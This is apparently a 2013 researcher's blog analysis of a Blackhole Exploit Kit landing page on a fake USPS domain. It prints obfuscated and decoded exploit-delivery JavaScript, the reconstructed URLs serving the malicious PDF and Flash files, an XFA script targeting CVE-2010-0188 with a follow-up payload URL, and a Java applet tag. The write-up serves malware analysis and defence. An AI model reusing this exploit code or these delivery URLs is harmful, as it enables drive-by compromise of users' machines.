BHEK 2.x with Plugin detect 0.7.9
I saw a tweet for a Virustotal 0/45 and a urlquery.net link so I got curious:
At first glance this looks like a BHEK case to me. This is my first real go at analyzing BHEK so bare with me...
The url from urlquery: hxxp://www5-usps.com/nbh/sends/track.php resolving to 46.166.179.122
Virustotal report 0/31
Lets go and fetch it:
--2013-02-26 23:53:55-- hxxp://www5-usps.com/nbh/sends/track.php Resolving www5-usps.com... 46.166.179.122 Connecting to www5-usps.com|46.166.179.122|:80... connected. HTTP request sent, awaiting response... HTTP/1.1 200 OK Server: nginx/0.7.67 Date: Tue, 26 Feb 2013 22:58:09 GMT Content-Type: text/html Connection: close X-Powered-By: PHP/5.4.12 Length: unspecified [text/html] Saving to: `track.php' 0K .......... .......... .......... .......... .......... 196K 50K .......... .......... .......... .......... .......... 74.3K 100K ......... 1.09M=0.9s 2013-02-26 23:53:58 (117 KB/s) - `track.php' saved [112216]
This gives us a page with obfuscated JavaScript on it:
(Full page at pastebin) language="javascript">var a = "112:1OO:112:1OO:61:123:11(:1O1:114:115:1O5:111:11O:5(:34:4(:46:55:46:57:34:44:11O:97:1O9:1O1:5(:34:112:1OO:112:1OO:34:44:1O4:97:11O:1OO:1O(:1O1:114:5(:1O2:117:11O:99:116:1O5:111:11O:4O:99:44:9(:44:97:41:123:114:1O1:116:117:114:11O:32:1O2:117:11O:99:116:1O5:111:11O:4O:41:123:99:4O:9(:44:97:41:125:125:44:111:112:1O1:11O:(4:97:1O3:5(:34:6O:34:44:1O5:115:6(:1O1:1O2:1O5:11O:1O1:1OO:5(:1O2:117:11O:99:116:1O5:111:11O:4O:9(:41:123:114:1O1:116:117:114:11O:32:116:121:112:1O1:111:1O2:32:9(:33:61:34:117:11O:1OO:1O1:1O2:1O5:11O:1O1:1OO:34:125:44:1O5:115:65:114:114:97:121:5(:1O2:117:11O:99:116:1O5:111:11O:4O:9(:41:123:114:1O1:116:117:114:11O:4O:47:97:114:114:97:121:47:1O5:41:46:116:1O1:115:116:4O:79:9(:1O6:1O1:99:116:46:112:114:111:116:111:116:121:112:1O1:46:116:111:(3:116:114:1O5:11O:1O3:46:99:97:1O(:1O(:4O:9(:41:41:125:44:1O5:115:7O:117:11O:99:5(:1O2:117:11O:99:116:1O5:111:11O:4O:9(:41:123:114:1O1:116:117:114:11O:32:116:121:112:1O1:111:1O2:32:9(:61:61:34:1O2:117:11O:99:116:1O5:111:11O:34:125:44:1O5:115:(3:116:114:1O5:11O:1O3:5(:1O2:117:11O:99:116:1O5:111:11O:4O:9(:41:123:114:1O1:116:117:114:11O:32:116:121:112:1O1:111:1O2:32:9(:61:61:34:115:116:114:1O5:11O:1O3:34:125:44:1O5:115:7(:117:1O9:5(:1O2:117:11O:99:116:1O5:111:11O:4O:9(:41:123:114:1O1:116:117:114:11O:32:116:121:112:1O1:111:1O2:32:9(:61:61:34:11O:117:1O9:9(:1O1:114:34:125:44:1O5:115:(3:116:114:7(:117:1O9:5(:1O2:117:11O:99:116:1O5:111:11O:4O:9(:41:123:114:1O1:116:117:114:11O:4O:116:121:112:1O1:111:1O2:32:9(:61:61:34:115:116:114:1O5:11O:1O3:34:3(:3(:4O:47:92:1OO:47:41:46:116:1O1:115:116:4O:9(:41:41:125:44:1O3:1O1:116:7(:117:1O9:(2:1O1:1O3:12O:5(:47:91:92:1OO:93:91:92:1OO:92:46:92:95:44:45:93:42:47:44:115:112:1O(:1O5:116:7(:117:1O9:
:
:
Lets run it through jsbeautifier.org to clean it up:
(Fully beautified page at pastebin)if (window.document)
function c() {
for (i = 0, s = ""; i < a.length; i++) {
s += String["f" + "r" + "o" + "mCh" + "arC" + ff](a[i]);
}
}
if (window.document) csq = function () {
z(s);
};
try {
document.body ^= 2
} catch (q) {
xc = 1;
if (q) e = eval;
rr = "rep" + "la" + "ce";
doc = document;
}
try {
doc["body"] %= 2
} catch (q) {
ff = "ode";
}
try {
gewh = 1;
} catch (sav) {
xc = false;
}
vvz = "\\(";
var a = "112:100:112:100:61:123:11(:101:114:115:105:111
Decoding this will give us the following most interseting parts:
wepawet link
Hello plugin detect 0.7.9
pdpd = {
version: "O.7.9",
name: "pdpd",
handler: function(c, b, a) {
return function() {
c(b, a)
}
:
:
function x(s) {
d = [];
for (i = O; i < s.length; i++) {
k = (s.charCodeAt(i)).toString(33);
d.push(k);
};
return d.join(":");
}
:
:
function j1() {
return true;
}
function j2() {
return true;
}
function p1() {
var d = document.createElement("object");
d.setAttribute("data", "/nbh/sends/track.php?wxgnkiyn=" + x("8fa62") + "&ynis=" + x("ymg") + "&sspcu=3O:3O:33:1k:1h:31:2v:1n:1l:1h&pie=" + x(pdfver.join(".")));
d.setAttribute("type", "application/pdf");
document.body.appendChild(d);
}
function p2() {
var d = document.createElement("object");
d.setAttribute("data", "/nbh/sends/track.php?zaigqae=" + x("8fa62") + "&xtdgebs=" + x("j") + "&qbthq=3O:3O:33:1k:1h:31:2v:1n:1l:1h&yphqibh=" + x(pdfver.join(".")));
d.setAttribute("type", "application/pdf");
document.body.appendChild(d);
}
function p3() {
return false;
}
function f1() {
var oSpan = document.createElement("span");
document.body.appendChild(oSpan);
var url = "/nbh/sends/track.php?pbf=" + x("8fa62") + "&jsttgj=" + x("nikbgp") + "&gbtov=3O:3O:33:1k:1h:31:2v:1n:1l:1h&info=O2e6b1525353caa8ad5555554daf57575452ac31b4b5afb531bOaa5534b73153ac55533O36b4ac51b252ca3556b1cf4f7e7af15O6acc";
oSpan.innerHTML = "<object classid='clsid:D27CDB6E-AE6D-11cf-96B8-44455354OOOO' id='asd' width='6OO' height='4OO' codebase='http://download.macromedia.com/pub/shockwave/cabs/flash/swflash.cab'><param name='movie' value='" + url + "' /><embed src='" + url + "' name='asd' align='middle' allowNetworking='all' type='application/x-shockwave-flash' pluginspage='http://www.macromedia.com/go/getflashplayer'></embed></object>";
}
function ff2() {
return false;
}
:
:
We have now the functions that makes the calls for the PDF's and Flash files.
There is little obfuscation left now, so by running the x() function to get output the missing strings, we can now get the full URL's needed to fetch the PDF files and the Flash file. These parameters are needed to get the files that will exploit out client.Lets fetch the exploit files:
Adobe 8.0 as input to p1():
Virustotal report 21/46
--2013-02-27 00:01:47-- hxxp://www5-usps.com/nbh/sends/track.php?zaigqae=1n:33:2v:1l:1h&xtdgebs=37&qbthq=30:30:33:1k:1h:31:2v:1n:1l:1h&yphqibh=1n:1d:1f:1d:1f:1d:1j:1k:1l Resolving www5-usps.com... 46.166.179.122 Connecting to www5-usps.com|46.166.179.122|:80... connected. HTTP request sent, awaiting response... HTTP/1.1 200 OK Server: nginx/0.7.67 Date: Tue, 26 Feb 2013 23:06:04 GMT Content-Type: application/pdf Connection: keep-alive X-Powered-By: PHP/5.4.12 Accept-Ranges: bytes Content-Length: 9874 Content-Disposition: inline; filename=c516a.pdf Length: 9874 (9.6K) [application/pdf] Saving to: `track.php?zaigqae=1n:33:2v:1l:1h&xtdgebs=37&qbthq=30:30:33:1k:1h:31:2v:1n:1l:1h&yphqibh=1n:1d:1f:1d:1f:1d:1j:1k:1l' 0K ......... 100% 114K=0.08s 2013-02-27 00:01:52 (114 KB/s) - `track.php?zaigqae=1n:33:2v:1l:1h&xtdgebs=37&qbthq=30:30:33:1k:1h:31:2v:1n:1l:1h&yphqibh=1n:1d:1f:1d:1f:1d:1j:1k:1l' saved [9874/9874]
Adobe 8.0 as input to p1():
--2013-02-27 00:14:32-- hxxp://www5-usps.com//nbh/sends/track.php?wxgnkiyn=1n:33:2v:1l:1h&ynis=3m:3a:34&sspcu=30:30:33:1k:1h:31:2v:1n:1l:1h&pie=1n:1d:1f Resolving www5-usps.com... 46.166.179.122 Connecting to www5-usps.com|46.166.179.122|:80... connected. HTTP request sent, awaiting response... HTTP/1.1 200 OK Server: nginx/0.7.67 Date: Tue, 26 Feb 2013 23:18:49 GMT Content-Type: application/pdf Connection: keep-alive X-Powered-By: PHP/5.4.12 Content-Length: 20065 ETag: "c6c16a19dfb3210cd8d680eef3a24429" Last-Modified: Tue, 26 Feb 2013 23:17:43 GMT Accept-Ranges: bytes Length: 20065 (20K) [application/pdf] Saving to: `track.php?wxgnkiyn=1n:33:2v:1l:1h&ynis=3m:3a:34&sspcu=30:30:33:1k:1h:31:2v:1n:1l:1h&pie=1n:1d:1f' 0K .......... ......... 100% 91.2K=0.2s 2013-02-27 00:14:37 (91.2 KB/s) - `track.php?wxgnkiyn=1n:33:2v:1l:1h&ynis=3m:3a:34&sspcu=30:30:33:1k:1h:31:2v:1n:1l:1h&pie=1n:1d:1f' saved [20065/20065]
Adobe 8.1 as input to p1():
--2013-02-27 00:15:39-- hxxp://www5-usps.com//nbh/sends/track.php?wxgnkiyn=1n:33:2v:1l:1h&ynis=3m:3a:34&sspcu=30:30:33:1k:1h:31:2v:1n:1l:1h&pie=1n:1d:1g Resolving www5-usps.com... 46.166.179.122 Connecting to www5-usps.com|46.166.179.122|:80... connected. HTTP request sent, awaiting response... HTTP/1.1 200 OK Server: nginx/0.7.67 Date: Tue, 26 Feb 2013 23:19:59 GMT Content-Type: application/pdf Connection: keep-alive X-Powered-By: PHP/5.4.12 Content-Length: 20053 ETag: "e03b272d4c3f1b6dd29e5ae5c4e69c28" Last-Modified: Tue, 26 Feb 2013 23:18:52 GMT Accept-Ranges: bytes Length: 20053 (20K) [application/pdf] Saving to: `track.php?wxgnkiyn=1n:33:2v:1l:1h&ynis=3m:3a:34&sspcu=30:30:33:1k:1h:31:2v:1n:1l:1h&pie=1n:1d:1g' 0K .......... ......... 100% 117K=0.2s 2013-02-27 00:15:47 (117 KB/s) - `track.php?wxgnkiyn=1n:33:2v:1l:1h&ynis=3m:3a:34&sspcu=30:30:33:1k:1h:31:2v:1n:1l:1h&pie=1n:1d:1g' saved [20053/20053]
Adobe 7.0 as input to p1():
--2013-02-27 00:19:33-- hxxp://www5-usps.com//nbh/sends/track.php?wxgnkiyn=1n:33:2v:1l:1h&ynis=3m:3a:34&sspcu=30:30:33:1k:1h:31:2v:1n:1l:1h&pie=1m:1d:1f Resolving www5-usps.com... 46.166.179.122 Connecting to www5-usps.com|46.166.179.122|:80... connected. HTTP request sent, awaiting response... HTTP/1.1 200 OK Server: nginx/0.7.67 Date: Tue, 26 Feb 2013 23:23:49 GMT Content-Type: application/pdf Connection: keep-alive X-Powered-By: PHP/5.4.12 Content-Length: 20041 ETag: "dca06b8cac6d323ef4819ebb35713352" Last-Modified: Tue, 26 Feb 2013 23:22:43 GMT Accept-Ranges: bytes Length: 20041 (20K) [application/pdf] Saving to: `track.php?wxgnkiyn=1n:33:2v:1l:1h&ynis=3m:3a:34&sspcu=30:30:33:1k:1h:31:2v:1n:1l:1h&pie=1m:1d:1f' 0K .......... ......... 100% 88.2K=0.2s 2013-02-27 00:19:37 (88.2 KB/s) - `track.php?wxgnkiyn=1n:33:2v:1l:1h&ynis=3m:3a:34&sspcu=30:30:33:1k:1h:31:2v:1n:1l:1h&pie=1m:1d:1f' saved [20041/20041]
Adobe 8.0 as input to p2():
Virustotal report 21/46
--2013-02-27 00:23:46-- hxxp://www5-usps.com/nbh/sends/track.php?zaigqae=1n:33:2v:1l:1h&xtdgebs=37&qbthq=30:30:33:1k:1h:31:2v:1n:1l:1h&yphqibh=1n:1d:1f Resolving www5-usps.com... 46.166.179.122 Connecting to www5-usps.com|46.166.179.122|:80... connected. HTTP request sent, awaiting response... HTTP/1.1 200 OK Server: nginx/0.7.67 Date: Tue, 26 Feb 2013 23:27:59 GMT Content-Type: application/pdf Connection: keep-alive X-Powered-By: PHP/5.4.12 Accept-Ranges: bytes Content-Length: 10838 Content-Disposition: inline; filename=6ed41.pdf Length: 10838 (11K) [application/pdf] Saving to: `track.php?zaigqae=1n:33:2v:1l:1h&xtdgebs=37&qbthq=30:30:33:1k:1h:31:2v:1n:1l:1h&yphqibh=1n:1d:1f' 0K .......... 100% 83.6K=0.1s 2013-02-27 00:23:47 (83.6 KB/s) - `track.php?zaigqae=1n:33:2v:1l:1h&xtdgebs=37&qbthq=30:30:33:1k:1h:31:2v:1n:1l:1h&yphqibh=1n:1d:1f' saved [10838/10838]
Adobe 9.0 as input to p2():
Virustotal report 21/46
--2013-02-27 00:26:30-- hxxp://www5-usps.com/nbh/sends/track.php?zaigqae=1n:33:2v:1l:1h&xtdgebs=37&qbthq=30:30:33:1k:1h:31:2v:1n:1l:1h&yphqibh=1o:1d:1f Resolving www5-usps.com... 46.166.179.122 Connecting to www5-usps.com|46.166.179.122|:80... connected. HTTP request sent, awaiting response... HTTP/1.1 200 OK Server: nginx/0.7.67 Date: Tue, 26 Feb 2013 23:30:53 GMT Content-Type: application/pdf Connection: keep-alive X-Powered-By: PHP/5.4.12 Accept-Ranges: bytes Content-Length: 10815 Content-Disposition: inline; filename=7453e.pdf Length: 10815 (11K) [application/pdf] Saving to: `track.php?zaigqae=1n:33:2v:1l:1h&xtdgebs=37&qbthq=30:30:33:1k:1h:31:2v:1n:1l:1h&yphqibh=1o:1d:1f' 0K .......... 100% 123K=0.09s 2013-02-27 00:26:41 (123 KB/s) - `track.php?zaigqae=1n:33:2v:1l:1h&xtdgebs=37&qbthq=30:30:33:1k:1h:31:2v:1n:1l:1h&yphqibh=1o:1d:1f' saved [10815/10815]
Flash f1():
Virustotal report 10/46
--2013-02-27 00:31:24-- hxxp://www5-usps.com/nbh/sends/track.php?pbf=1n:33:2v:1l:1h&jsttgj=3b:36:38:2w:34:3d&gbtov=30:30:33:1k:1h:31:2v:1n:1l:1h&info=02e6b1525353caa8ad5555554daf57575452ac31b4b5afb531b0aa5534b73153ac55533036b4ac51b252ca3556b1cf4f7e7af1506acc Resolving www5-usps.com... 46.166.179.122 Connecting to www5-usps.com|46.166.179.122|:80... connected. HTTP request sent, awaiting response... HTTP/1.1 200 OK Server: nginx/0.7.67 Date: Tue, 26 Feb 2013 23:35:43 GMT Content-Type: text/html Connection: close X-Powered-By: PHP/5.4.12 Length: unspecified [text/html] Saving to: `track.php?pbf=1n:33:2v:1l:1h&jsttgj=3b:36:38:2w:34:3d&gbtov=30:30:33:1k:1h:31:2v:1n:1l:1h&info=02e6b1525353caa8ad5555554daf57575452ac31b4b5afb531b0aa5534b73153ac55533036b4ac51b252ca3556b1cf4f7e7af1506acc' 0K .. 121M=0s 2013-02-27 00:31:32 (121 MB/s) - `track.php?pbf=1n:33:2v:1l:1h&jsttgj=3b:36:38:2w:34:3d&gbtov=30:30:33:1k:1h:31:2v:1n:1l:1h&info=02e6b1525353caa8ad5555554daf57575452ac31b4b5afb531b0aa5534b73153ac55533036b4ac51b252ca3556b1cf4f7e7af1506acc' saved [2671]
Happy to get the files :) but no time to analyze them further at the time :(
Update 2013-02-28
I got time to look more into this case and lets start looking into the PDFs:
Lets see if the files hide something we could look more into,
c516a.pdf:
statistics:
c516a.pdf:
statistics:
Comment: 4 XREF: 1 Trailer: 0 StartXref: 0 Indirect object: 26 11: 52, 6, 18, 19, 20, 21, 22, 28, 31, 32, 48 /Annot 1: 15 /Catalog 1: 1 /EmbeddedFile 6: 41, 42, 99999, 44, 45, 46 /Font 3: 14, 27, 29 /FontDescriptor 1: 30 /Page 1: 8 /Pages 1: 2 /Pattern 1: 13
lets look more into object 99999
obj 99999 0
Type: /EmbeddedFile
Referencing:
Contains stream
<</Length
1313 / Filter / FlateDecode / Type / EmbeddedFile >>
<< /Length 1313
/Filter / FlateDecode / Type / EmbeddedFile >>
< template > < subform name = "form1"
layout = "tb"
locale = "ru_RU" > < pageSet > < pageArea > < contentArea h = "10.5in"
w = "8in"
x = "0.25in"
y = "0.25in" > < /contentArea><medium long="11in" short="8.5in" stock="letter"></medium > < /pageArea></pageSet > < subform h = "10.5in"
w = "8in" > < field h = "98.425mm"
name = "ImageField1"
w = "28.575mm"
x = "95.25mm"
y = "19.05mm" > < ui > < imageEdit > < /imageEdit></ui > < event activity = "initialize"
xmlns: xfa = "http://testset.com" > < xfa: script contentType = 'application/x-javascript' > p = parseIn & #116;;
a= & quot;
53 * * ^ !@# * * 48 * * 4P * * 1L * * 4N * * ^ !@# * * 48 * * 4B * * 4B * * 4G * * ^ !@# * * 4L * * 4E * * 2M * * 53 * * ^ !@# * * 48 * * 4P * * 1L * * 49 * * ^ !@# * * 49 * * 49 * * 27 * * 1L * * ^ !@# * * 4A * * 4A * * 4A * * 27 * * ^ !@# * * 1L * * 4B * * 4B * * 4B * * ^ !@# * * 27 * * 1L * * 4C * * 4C * * ^ !@# * * 4C * * 27 * * 1L * * 4D * * ^ !@# * * 4D * * 4D * * 27 * * 1L * * ^ !@# * * 4E * * 4E * * 4E * * 27 * * ^ !@# * * 1L * * 4F * * 4F * * 4F * * ^ !@# * * 2M * * 53 * * 48 * * 4P * * ^ !@# * * 1L * * 4N * * 4M * * 4G * * ^ !@# * * 4L * * 51 * * 4C * * 4P * * ^ !@# * * 50 * * 46 * * 48 * * 27 * * ^ !@# * * 1L * * 4G * * 2M * * 53 * * ^ !@# * * 48 * * 4P * * 1L * * 55 * * ^ !@# * * 1L * * 2O * * 1L * * 4L * * ^ !@# * * 4C * * 54 * * 1L * * 32 * * ^ !@# * * 4P * * 4P * * 48 * * 56 * * ^ !@# * * 23 * * 24 * * 2M * * 53 * * ^ !@# * * 48 * * 4P * * 1L * * 56 * * ^ !@# * * 1L * * 2O * * 1L * * 4L * * ^ !@# * * 4C * * 54 * * 1L * * 32 * * ^ !@# * * 4P * * 4P * * 48 * * 56 * * ^ !@# * * 23 * * 24 * * 2M * * 53 * * ^ !@# * * 48 * * 4P * * 1L * * 46 * * ^ !@# * * 4J * * 2C * * 2O * * 1N * * ^ !@# * * 2F * * 4A * * 2D * * 2B * * ^ !@# * * 2H * * 2B * * 2B * * 4D * * ^ !@# * * 2B * * 2G * * 2C * * 2I * * ^ !@# * * 2J * * 2B * * 2F * * 48 * * ^ !@# * * 2E * * 4A * * 2D * * 2B * * ^ !@# * * 2H * * 2B * * 2B * * 4D * * ^ !@# * * 2B * * 4D * * 2H * * 2E * * ^ !@# * * 2J * * 2B * * 2F * * 48 * * ^ !@# * * 48 * * 2E * * 4C * * 49 * * ^ !@# * * 2J * * 2B * * 2F * * 48 * * ^ !@# * * 2E * * 2B * * 2D * * 2B * * ^ !@# * * 2J * * 2D * * 2F * * 48 * * ^ !@# * * 2H * * 4C * * 2D * * 4D * * ^ !@# * * 2J * * 2B * * 2F * * 48 * * ^ !@# * * 2F * * 2C * * 2F * * 2C * * ^ !@# * * 2F * * 2C * * 2F * * 2C * * ^ !@# * * 2D * * 2H * * 2B * * 2B * * ^ !@# * * 2B * * 2B * * 2B * * 2B * * ^ !@# * * 2B * * 2B * * 2B * * 2B * * ^ !@# * * 2B * * 2B * * 2B * * 2B * * ^ !@# * * 2B * * 2B * * 2B * * 2B * * ^ !@# * * 2B * * 2B * * 2B * * 2B * * ^ !@# * * 2B * * 2B * * 2B * * 2B * * ^ !@# * * 2B * * 2B * * 2B * * 2B * * ^ !@# * * 2C * * 2D * * 2E * * 2K * * ^ !@# * * 2J * * 2B * * 2F * * 48 * * ^ !@# * * 2H * * 2F * * 2D * * 2B * * ^ !@# * * 2H * * 2B * * 2B * * 4D * * ^ !@# * * 2B * * 2B * * 2B * * 2F * * ^ !@# * * 2B * * 2B * * 2B * * 2B * * ^ !@# * * 2F * * 2C * * 2F * * 2C * * ^ !@# * * 2F * * 2C * * 2F * * 2C * * ^ !@# * * 2F * * 2C * * 2F * * 2C * * ^ !@# * * 2F * * 2C * * 2F * * 2C * * ^ !@# * * 1N * * 26 * * 1N * * 2B * * ^ !@# * * 2B * * 2B * * 2B * * 4D * * ^ !@# * * 2H * * 49 * * 2H * * 4B * * ^ !@# * * 2H * * 2K * * 2I * * 2C * * ^ !@# * * 2H * * 4B * * 2E * * 2G * * ^ !@# * * 2I * * 2K * * 2I * * 2B * * ^ !@# * * 2I * * 2H * * 2D * * 48 * * ^ !@# * * 2I * * 2C * * 2I * * 2D * * ^ !@# * * 2I * * 2H * * 2H * * 2C * * ^ !@# * * 2H * * 48 * * 2H * * 4B * * ^ !@# * * 2E * * 2H * * 2I * * 2F * * ^ !@# * * 2H * * 2F * * 2H * * 4C * * ^ !@# * * 2H * * 4D * * 2H * * 2H * * ^ !@# * * 2D * * 2K * * 2H * * 2C * * ^ !@# * * 2E * * 4B * * 2E * * 2C * * ^ !@# * * 2I * * 2E * * 2I * * 2E * * ^ !@# * * 2H * * 4C * * 2H * * 2J * * ^ !@# * * 2H * * 2D * * 2H * * 2H * * ^ !@# * * 2D * * 2J * * 2H * * 2C * * ^ !@# * * 2E * * 48 * * 2E * * 4A * * ^ !@# * * 2H * * 2C * * 2E * * 48 * * ^ !@# * * 2E * * 4C * * 2H * * 2C * * ^ !@# * * 2E * * 48 * * 2E * * 2H * * ^ !@# * * 2I * * 2D * * 2E * * 48 * * ^ !@# * * 2E * * 2C * * 2E * * 2E * * ^ !@# * * 2E * * 48 * * 2E * * 2J * * ^ !@# * * 2H * * 2C * * 2E * * 48 * * ^ !@# * * 2E * * 49 * * 2H * * 2C * * ^ !@# * * 2E * * 48 * * 2E * * 2E * * ^ !@# * * 2E * * 2E * * 2E * * 48 * * ^ !@# * * 2E * * 2B * * 2E * * 2E * * ^ !@# * * 2E * * 48 * * 2E * * 2B * * ^ !@# * * 2E * * 2E * * 2E * * 4B * * ^ !@# * * 2E * * 2F * * 2I * * 2B * * ^ !@# * * 2I * * 2I * * 2H * * 48 * * ^ !@# * * 2H * * 2E * * 2I * * 2F * * ^ !@# * * 2I * * 2B * * 2I * * 2J * * ^ !@# * * 2I * * 2H * * 2D * * 48 * * ^ !@# * * 2H * * 2C * * 2E * * 48 * * ^ !@# * * 2E * * 4A * * 2H * * 2C * * ^ !@# * * 2E * * 48 * * 2E * * 4A * * ^ !@# * * 2H * * 2C * * 2E * * 48 * * ^ !@# * * 2E * * 2J * * 2H * * 2C * * ^ !@# * * 2E * * 48 * * 2E * * 2D * * ^ !@# * * 2E * * 2E * * 2E * * 4B * * ^ !@# * * 2E * * 4B * * 2H * * 2E * * ^ !@# * * 2H * * 48 * * 2I * * 4D * * ^ !@# * * 2E * * 2B * * 2I * * 2J * * ^ !@# * * 2H * * 2B * * 2I * * 4C * * ^
:
:
a = a.replace.apply(a, [/\^!@#/g, & quot; & quot;]);
a = a.replace.apply(a, [/\*\*/g, & quot; & quot;]);
s = [];
for (i = 0; i & lt; a. & #108;ength;i+= 2) {
s.push(p(a. & #115;ubstr(i,2),26)-15);
}
ss= String. & #102;romCharCode;
if(event.target.info.Authors= == null) if (event.target.filesize & gt;
(16000, 9000)) {
k = ss.apply(String, s);
q = "e" + ss.apply(String, [0x76, 0x61]);
event.target[q + "l"]( & #107;);
}
</xfa:script></event></field></subform><proto></proto></subform><?templateDesigner DefaultLanguage FormCalc?><?templateDesigner DefaultRunAt client?><?templateDesigner Grid show:1, snap:1, units:0, color:ff8080, origin:(0,0), interval:(125000,125000)?><?templateDesigner Rulers horizontal:1, vertical:1, guidelines:1, crosshairs:0?><?templateDesigner Zoom 76?></template>
Pretty ugly stuff here: JavaScript which tries to use CVE 2010-0188.
After exploiting the client it will try to fetch additional payload from
hxxp://www5-usps.com/nbh/sends/track.php?jggg=32:1h:1l:1l:1j&ccb=30:30:33:1k:1h:31:2v:1n:1l:1h&qjqjo=1i&madrmk=fsjuhw&aazds=seyv
Since I left this alone for a couple of days the site was, as expected, not serving me anything anymore so no additional pyload for me.
WepaWet report here
The same method was used for the other PDFs:
6ed41.pdf -> WebaWet
7453e.pdf -> WepAwet
No Java?
I had expected som Java stuff to hit me from the EK as well. But since I went straight for the plugin detect stuff, I missed this code:<applet code="&#OO1O4;&#OO119;" archive="/nbh/sends/track.php">
<param value="Dyy3Ojj" name="val" />
<param value="fa" name="earth" />
<param name="prime" value="___4mKi3iw%tOjo?DjieoMijylV%qw3D3xA.b1hO6DO6-O6-O6CRVeb1fO1fO11O6qO6DO16OhvO6oO6-O6DRCb6.RVObqRAlb-" />
</applet>
Too late to fetch the jar as well.